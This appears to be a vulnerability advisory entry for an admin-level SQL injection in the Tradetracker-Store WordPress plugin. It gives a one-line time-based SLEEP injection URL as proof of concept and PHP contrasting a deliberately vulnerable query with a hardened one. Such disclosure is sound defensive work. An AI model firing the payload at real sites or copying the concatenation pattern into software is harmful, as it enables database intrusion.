WordPress Plugin Vulnerabilities
Tradetracker-Store < 4.6.60 - Admin+ SQL Injection
Description
The test parameter of the plugin's xmlfeed option page is not sanitised, escaped or validated before being inserted into a SQL statement, leading to SQL injection.
Proof of Concept
https://example.com/wp-admin/admin.php?page=tt-store&option=xmlfeed&test=1%20AND%20(SELECT%209966%20FROM%20(SELECT(SLEEP(5)))OhCe) HTTP/1.1
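As an added example (not the plugin's code; the table, column and function names are hypothetical), the unsafe pattern the description refers to, beside a hardened version that enforces the integer type, checks the caller's capability and binds the value with $wpdb->prepare():

```php
<?php
// Added illustration, not Tradetracker-Store code. Table and function names are hypothetical.

// Vulnerable pattern: the raw request value is concatenated into the SQL string,
// so a value such as "1 AND (SELECT ...)" becomes part of the query.
function ttstore_example_feed_vulnerable( $wpdb, array $request ) {
    $test = $request['test'];
    $sql  = "SELECT id, name FROM {$wpdb->prefix}ttstore_feeds WHERE test = " . $test;
    return $wpdb->get_results( $sql );
}

// Accept only a non-negative integer string; anything else (spaces, parentheses,
// keywords) is rejected before it can reach the database layer.
function ttstore_example_is_valid_test( $value ) {
    return is_scalar( $value ) && ctype_digit( (string) $value );
}

// Hardened pattern: capability check, strict validation, then parameter binding.
function ttstore_example_feed_hardened( $wpdb, array $request ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        return new WP_Error( 'forbidden', 'Insufficient capability.' );
    }
    if ( ! isset( $request['test'] ) || ! ttstore_example_is_valid_test( $request['test'] ) ) {
        return new WP_Error( 'invalid_param', 'test must be a non-negative integer.' );
    }
    $test = absint( $request['test'] );
    // %d forces an integer placeholder; $wpdb->prepare() handles the quoting.
    $sql = $wpdb->prepare(
        "SELECT id, name FROM {$wpdb->prefix}ttstore_feeds WHERE test = %d",
        $test
    );
    return $wpdb->get_results( $sql );
}
```

With this validation the time-based payload in the proof of concept above is rejected at ttstore_example_is_valid_test(), and even a bare integer is bound rather than concatenated.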
Classification
Type
SQLI
Miscellaneous
Original Researcher
Syed Sheeraz Ali of Codevigilant
Verified
Yes
Timeline
Publicly Published
2021-05-13
Added
2022-02-14
Last Updated
2022-04-08